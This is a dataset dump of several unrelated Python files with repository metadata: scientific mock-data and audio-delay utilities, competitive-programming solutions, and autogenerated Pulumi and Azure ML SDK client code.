return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, SlotTypeDefinitionOutput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
46b7f2b1be3242b3a9fd4117a6a4d2ec15eabc2a | 7cb646a87705156e9d6e0b651df4c0a90a99947b | /phy/io/mock/kwik.py | eed05ce223d2cfe13a1c77dd59cf3e8a4654db4d | [] | no_license | cgestes/phy | 1339b8ce46ac076129496745c23d87bfc73e6407 | 8bb7b9377e6376dce46ef123ccc97ecf3671fb15 | refs/heads/master | 2021-01-18T10:21:35.785483 | 2015-04-16T11:42:39 | 2015-04-16T13:51:57 | 30,656,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,009 | py | # -*- coding: utf-8 -*-
"""Mock Kwik files."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os.path as op
import numpy as np
from ...io.mock.artificial import (artificial_spike_samples,
artificial_spike_clusters,
artificial_features,
artificial_masks,
artificial_traces)
from ...electrode.mea import staggered_positions
from ..h5 import open_h5
from ..kwik_model import _kwik_filenames, _create_clustering
#------------------------------------------------------------------------------
# Mock Kwik file
#------------------------------------------------------------------------------
def create_mock_kwik(dir_path, n_clusters=None, n_spikes=None,
n_channels=None, n_features_per_channel=None,
n_samples_traces=None,
with_kwx=True, with_kwd=True):
"""Create a test kwik file."""
filename = op.join(dir_path, '_test.kwik')
filenames = _kwik_filenames(filename)
kwx_filename = filenames['kwx']
kwd_filename = filenames['raw.kwd']
# Create the kwik file.
with open_h5(filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
def _write_metadata(key, value):
f.write_attr('/application_data/spikedetekt', key, value)
_write_metadata('sample_rate', 20000.)
# Filter parameters.
_write_metadata('filter_low', 500.)
_write_metadata('filter_high', 0.95 * .5 * 20000.)
_write_metadata('filter_butter_order', 3)
_write_metadata('extract_s_before', 15)
_write_metadata('extract_s_after', 25)
_write_metadata('nfeatures_per_channel', n_features_per_channel)
# Create spike times.
spike_samples = artificial_spike_samples(n_spikes).astype(np.int64)
spike_recordings = np.zeros(n_spikes, dtype=np.uint16)
# Size of the first recording.
recording_size = 2 * n_spikes // 3
# Find the recording offset.
recording_offset = spike_samples[recording_size]
recording_offset += spike_samples[recording_size + 1]
recording_offset //= 2
spike_recordings[recording_size:] = 1
# Make sure the spike samples of the second recording start over.
spike_samples[recording_size:] -= spike_samples[recording_size]
spike_samples[recording_size:] += 10
if spike_samples.max() >= n_samples_traces:
raise ValueError("There are too many spikes: decrease 'n_spikes'.")
f.write('/channel_groups/1/spikes/time_samples', spike_samples)
f.write('/channel_groups/1/spikes/recording', spike_recordings)
f.write_attr('/channel_groups/1',
'channel_order',
np.arange(1, n_channels - 1)[::-1],
)
# Create channels.
positions = staggered_positions(n_channels)
for channel in range(n_channels):
group = '/channel_groups/1/channels/{0:d}'.format(channel)
f.write_attr(group, 'name', str(channel))
f.write_attr(group, 'position', positions[channel])
# Create spike clusters.
clusterings = [('main', n_clusters),
('automatic', n_clusters * 2),
]
for clustering, n_clusters_rec in clusterings:
spike_clusters = artificial_spike_clusters(n_spikes,
n_clusters_rec)
_create_clustering(f, clustering, 1, spike_clusters)
# Create recordings.
f.write_attr('/recordings/0', 'name', 'recording_0')
f.write_attr('/recordings/1', 'name', 'recording_1')
# Create the kwx file.
if with_kwx:
with open_h5(kwx_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
features = artificial_features(n_spikes,
(n_channels - 2) *
n_features_per_channel)
masks = artificial_masks(n_spikes,
(n_channels - 2) *
n_features_per_channel)
fm = np.dstack((features, masks)).astype(np.float32)
f.write('/channel_groups/1/features_masks', fm)
# Create the raw kwd file.
if with_kwd:
with open_h5(kwd_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
traces = artificial_traces(n_samples_traces, n_channels)
# TODO: int16 traces
f.write('/recordings/0/data',
traces[:recording_offset, ...].astype(np.float32))
f.write('/recordings/1/data',
traces[recording_offset:, ...].astype(np.float32))
return filename
| [
"[email protected]"
] | |
c72670766922c59f54f1e38c3251a93c3d29440e | 8ed4bf9fbead471c9e5f88e4d18ac432ec3d628b | /hackerrank/algorithm/string/reduced_string.py | 0fec6e1adc81c9b8b46f35b176b59a2b2e96024b | [] | no_license | hizbul25/programming_problem | 9bf26e49ed5bb8c9c829d00e765c9401222fb35c | 2acca363704b993ffe5f6c2b00f81a4f4eca7204 | refs/heads/master | 2021-01-10T22:28:26.105787 | 2018-01-21T16:45:45 | 2018-01-21T16:45:45 | 65,394,734 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | # URL: https://www.hackerrank.com/challenges/reduced-string
s = input()
stack = []
for i in range(len(s)):
if not stack or s[i] != stack[-1]:
stack += [s[i]]
else:
stack.pop()
if stack:
print(''.join(stack))
else:
print('Empty String') | [
"[email protected]"
] | |
c2f63be45f8a4ef6445fb0981f9ae21611bb6d46 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/web/v20181101/get_web_app_swift_virtual_network_connection_slot.py | 5279f9e04c7689c8359817ea2659e83821fa878c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 5,220 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetWebAppSwiftVirtualNetworkConnectionSlotResult',
'AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult',
'get_web_app_swift_virtual_network_connection_slot',
]
@pulumi.output_type
class GetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
"""
def __init__(__self__, id=None, kind=None, name=None, subnet_resource_id=None, swift_supported=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if subnet_resource_id and not isinstance(subnet_resource_id, str):
raise TypeError("Expected argument 'subnet_resource_id' to be a str")
pulumi.set(__self__, "subnet_resource_id", subnet_resource_id)
if swift_supported and not isinstance(swift_supported, bool):
raise TypeError("Expected argument 'swift_supported' to be a bool")
pulumi.set(__self__, "swift_supported", swift_supported)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="subnetResourceId")
def subnet_resource_id(self) -> Optional[str]:
"""
The Virtual Network subnet's resource ID. This is the subnet that this Web App will join. This subnet must have a delegation to Microsoft.Web/serverFarms defined first.
"""
return pulumi.get(self, "subnet_resource_id")
@property
@pulumi.getter(name="swiftSupported")
def swift_supported(self) -> Optional[bool]:
"""
A flag that specifies if the scale unit this Web App is on supports Swift integration.
"""
return pulumi.get(self, "swift_supported")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(GetWebAppSwiftVirtualNetworkConnectionSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=self.id,
kind=self.kind,
name=self.name,
subnet_resource_id=self.subnet_resource_id,
swift_supported=self.swift_supported,
type=self.type)
def get_web_app_swift_virtual_network_connection_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. If a slot is not specified, the API will get a gateway for the production slot's Virtual Network.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20181101:getWebAppSwiftVirtualNetworkConnectionSlot', __args__, opts=opts, typ=GetWebAppSwiftVirtualNetworkConnectionSlotResult).value
return AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
subnet_resource_id=__ret__.subnet_resource_id,
swift_supported=__ret__.swift_supported,
type=__ret__.type)
| [
"[email protected]"
] | |
e2daa17da7418fb80cec9ab0745d804c304546ab | fee71dd79c16f8e4aa4be46aa25863a3e8539a51 | /ear/core/delay.py | 58999508e96ec84140b7be0b2066bb0c4deb9373 | [
"BSD-3-Clause-Clear"
] | permissive | ebu/ebu_adm_renderer | d004ed857b3004c9de336426f402654779a0eaf8 | ef2189021203101eab323e1eccdd2527b32a5024 | refs/heads/master | 2023-08-09T09:13:06.626698 | 2022-12-07T12:22:39 | 2022-12-07T12:22:39 | 123,921,945 | 61 | 13 | BSD-3-Clause-Clear | 2023-08-30T17:17:05 | 2018-03-05T13:15:36 | Python | UTF-8 | Python | false | false | 1,676 | py | import numpy as np
class Delay(object):
"""Multi-channel delay line.
Parameters:
nchannels (int): number of channels to process
delay (int): number of samples to delay by
"""
def __init__(self, nchannels, delay):
assert delay >= 0
self.delaymem = np.zeros((delay, nchannels))
self.delay = delay
def process(self, input_samples):
"""Push n samples through the delay line.
Parameters:
input_samples (array of nsamples by nchannels): input samples
Returns:
array of nsamples by nchannels: output samples, delayed by delay
samples.
"""
output = np.zeros_like(input_samples)
# transfer samples from the delay memory followed by the input, to the
# output followed by the new delay memory, such that concat(src) before
# the transfer has the same value as concat(dst) after
src = [self.delaymem, input_samples]
dst = [output, self.delaymem]
# copy the common part of src[0] and dst[0]
start_len = min(len(src[0]), len(dst[0]))
if start_len: dst[0][:start_len] = src[0][:start_len]
# copy the part where src[0] overlaps dst[1] or src[1] overlaps dst[0]
overlap = len(src[0]) - len(dst[0])
if overlap > 0: # src[0] longer
dst[1][:overlap] = src[0][-overlap:]
elif overlap < 0: # dst[0] longer
dst[0][overlap:] = src[1][:-overlap]
# copy the common part of src[1] and dst[1]
end_len = min(len(src[1]), len(dst[1]))
if end_len: dst[1][-end_len:] = src[1][-end_len:]
return output
| [
"[email protected]"
] | |
42803d5018e53b70b319b1d8fc3cfa2d380118f7 | b8d2f095a4b7ea567ccc61ee318ba879318eec3d | /数组 Array/228. 汇总区间.py | 2459ae5ea8ae5dd79af2263fa4cdbfdda2c61f89 | [] | no_license | f1amingo/leetcode-python | a3ef78727ae696fe2e94896258cfba1b7d58b1e3 | b365ba85036e51f7a9e018767914ef22314a6780 | refs/heads/master | 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | from typing import List
class Solution:
def summaryRanges(self, nums: List[int]) -> List[str]:
if not nums:
return []
ans = []
lt, rt = nums[0], None
for i in range(len(nums) - 1):
if nums[i + 1] - nums[i] == 1:
# if t is None 和 if not t 并不等价
if lt is None:
lt = nums[i]
rt = nums[i + 1]
else:
ans.append(str(lt) + '->' + str(rt) if rt else str(lt))
lt, rt = nums[i + 1], None
ans.append(str(lt) + '->' + str(rt) if rt else str(lt))
return ans
assert Solution().summaryRanges([0]) == ['0']
assert Solution().summaryRanges([0, 1, 2, 4, 5, 7]) == ["0->2", "4->5", "7"]
assert Solution().summaryRanges([0, 2, 3, 4, 6, 8, 9]) == ["0", "2->4", "6", "8->9"]
assert Solution().summaryRanges([]) == []
assert Solution().summaryRanges([-1]) == ['-1']
| [
"[email protected]"
] | |
2ec9d717282626becf58a398a994ec197e90f564 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Kivy/python-for-android/pythonforandroid/recipes/ffpyplayer_codecs/__init__.py | 599d8d30207ce572fac347c18e6677d753b80e58 | [
"MIT"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:d196a4f300350342824820ae06ebac62968d8b22ad0fd350043b298a302af005
size 206
| [
"[email protected]"
] | |
235d72234d9d44c9e16f8a005e6726574387a789 | a689a72d3699883d7b58bd4ee3103373270bd0d5 | /BOJ/Python/BOJ17135.py | 5ecf7f7b4bd365d3f602a3d3ca99da2cd2830899 | [] | no_license | Oizys18/Algo | 4670748c850dc9472b6cfb9f828a3ccad9c18981 | 45caafe22a8a8c9134e4ff3b227f5f0be94eefe7 | refs/heads/master | 2022-05-11T08:35:06.812539 | 2022-05-07T01:30:41 | 2022-05-07T01:30:41 | 202,690,024 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | # 캐슬 디펜스
from pprint import pprint as pp
import collections
import itertools
import copy
N, M, D = map(int, input().split())
mat = [[*map(int, input().split())] for _ in range(N)] + [[0]*M]
archers = [0]*M
def isMap(x, y):
if 0 <= x < N + 2 and 0 <= y < M:
return True
else:
return False
def BFS(field, x, y):
visit = [[0]*M for _ in range(N+1)]
queue = []
queue.append((0, x, y))
while queue:
depth, x, y = queue.pop(0)
if depth > D:
continue
if not visit[x][y]:
visit[x][y] = 1
if field[x][y] == 1:
return (x, y)
for dx, dy in [(0, -1), (-1, 0), (0, 1)]:
nx = x + dx
ny = y + dy
if isMap(nx, ny):
queue.append((depth+1, nx, ny))
def fight():
kills = 0
field = collections.deque(copy.deepcopy(mat))
while True:
turnKill = set()
for x in range(N + 1):
for y in range(M):
if field[x][y] == 2:
killed = BFS(field, x, y)
if killed:
turnKill.add(killed)
for xt, yt in turnKill:
field[xt][yt] = 0
kills += 1
field.extendleft([[0]*M])
del field[N]
flag = 0
for a in range(N):
for b in range(M):
if field[a][b]:
flag = 1
if not flag:
return kills
res = 0
for chosen_archer in itertools.combinations(range(M), 3):
for ca in chosen_archer:
mat[N][ca] = 2
tactics = fight()
if res < tactics:
res = tactics
mat[N] = [0]*M
print(res)
| [
"[email protected]"
] | |
6b6946656fd1304aae15c78dde3c42a745ede7da | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2021_10_01_dataplanepreview/operations/_model_versions_operations.py | 96a47546ef9a6da776ce57b212c87f20db9d6679 | [
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 37,349 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_list_request(
name, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
skiptoken = kwargs.pop('skiptoken', None) # type: Optional[str]
order_by = kwargs.pop('order_by', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
version = kwargs.pop('version', None) # type: Optional[str]
description = kwargs.pop('description', None) # type: Optional[str]
tags = kwargs.pop('tags', None) # type: Optional[str]
properties = kwargs.pop('properties', None) # type: Optional[str]
list_view_type = kwargs.pop('list_view_type', None) # type: Optional[Union[str, "_models.ListViewType"]]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if skiptoken is not None:
query_parameters['$skiptoken'] = _SERIALIZER.query("skiptoken", skiptoken, 'str')
if order_by is not None:
query_parameters['$orderBy'] = _SERIALIZER.query("order_by", order_by, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
if version is not None:
query_parameters['version'] = _SERIALIZER.query("version", version, 'str')
if description is not None:
query_parameters['description'] = _SERIALIZER.query("description", description, 'str')
if tags is not None:
query_parameters['tags'] = _SERIALIZER.query("tags", tags, 'str')
if properties is not None:
query_parameters['properties'] = _SERIALIZER.query("properties", properties, 'str')
if list_view_type is not None:
query_parameters['listViewType'] = _SERIALIZER.query("list_view_type", list_view_type, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_request(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_get_request(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_create_or_update_request_initial(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str', pattern=r'^(?![\-_.])[a-zA-Z0-9\-_.]{1,255}(?<!\.)$'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_package_request_initial(
name, # type: str
version, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
content_type = kwargs.pop('content_type', None) # type: Optional[str]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions/{version}/package')
path_format_arguments = {
"name": _SERIALIZER.url("name", name, 'str', pattern=r'^[a-zA-Z0-9][a-zA-Z0-9\-_]{0,254}$'),
"version": _SERIALIZER.url("version", version, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str', min_length=1),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1),
"registryName": _SERIALIZER.url("registry_name", registry_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
class ModelVersionsOperations(object):
"""ModelVersionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.machinelearningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
name, # type: str
resource_group_name, # type: str
registry_name, # type: str
skiptoken=None, # type: Optional[str]
order_by=None, # type: Optional[str]
top=None, # type: Optional[int]
version=None, # type: Optional[str]
description=None, # type: Optional[str]
tags=None, # type: Optional[str]
properties=None, # type: Optional[str]
list_view_type=None, # type: Optional[Union[str, "_models.ListViewType"]]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ModelVersionResourceArmPaginatedResult"]
"""List versions.
List versions.
:param name: Container name. This is case-sensitive.
:type name: str
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param registry_name: Name of Azure Machine Learning registry.
:type registry_name: str
:param skiptoken: Continuation token for pagination.
:type skiptoken: str
:param order_by: Ordering of list.
:type order_by: str
:param top: Maximum number of records to return.
:type top: int
:param version: Version identifier.
:type version: str
:param description: Model description.
:type description: str
:param tags: Comma-separated list of tag names (and optionally values). Example:
tag1,tag2=value2.
:type tags: str
:param properties: Comma-separated list of property names (and optionally values). Example:
prop1,prop2=value2.
:type properties: str
:param list_view_type: View type for including/excluding (for example) archived entities.
:type list_view_type: str or ~azure.mgmt.machinelearningservices.models.ListViewType
:keyword api_version: Api Version. The default value is "2021-10-01-dataplanepreview". Note
that overriding this default value may result in unsupported behavior.
:paramtype api_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ModelVersionResourceArmPaginatedResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.machinelearningservices.models.ModelVersionResourceArmPaginatedResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop("api_version", "2021-10-01-dataplanepreview") # type: str
cls = kwargs.pop("cls", None) # type: ClsType["_models.ModelVersionResourceArmPaginatedResult"]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
name=name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
skiptoken=skiptoken,
order_by=order_by,
top=top,
version=version,
description=description,
tags=tags,
properties=properties,
list_view_type=list_view_type,
template_url=self.list.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
name=name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
registry_name=registry_name,
api_version=api_version,
skiptoken=skiptoken,
order_by=order_by,
top=top,
version=version,
description=description,
tags=tags,
properties=properties,
list_view_type=list_view_type,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("ModelVersionResourceArmPaginatedResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(get_next, extract_data)
